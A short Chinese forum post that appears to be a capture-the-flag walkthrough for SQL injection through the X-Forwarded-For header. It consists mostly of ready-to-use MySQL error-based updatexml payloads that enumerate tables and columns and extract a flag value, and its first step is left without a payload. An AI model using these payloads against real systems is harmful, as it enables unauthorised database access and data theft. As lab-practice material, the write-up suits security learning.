论坛首页 > 学习杂记

head注入(三)

adminyg   ·   发表于 2022-05-17 09:32:01   ·   学习杂记

这道题目需要自己添加头部 xff(X-Forwarded-For)
首先爆出库名为

然后再爆出表名
‘or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1),1)#

然后就是爆出列名
‘or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=”flag_head”)),1),1)#

最后查询即可
X-Forwarded-For: ‘or updatexml(1,concat(0x7e,(select flag_h1 from flag_head)),1),1)#
即可得出flag

打赏我,让我更有动力~

0 条回复   |  直到 2022-5-17 | 510 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.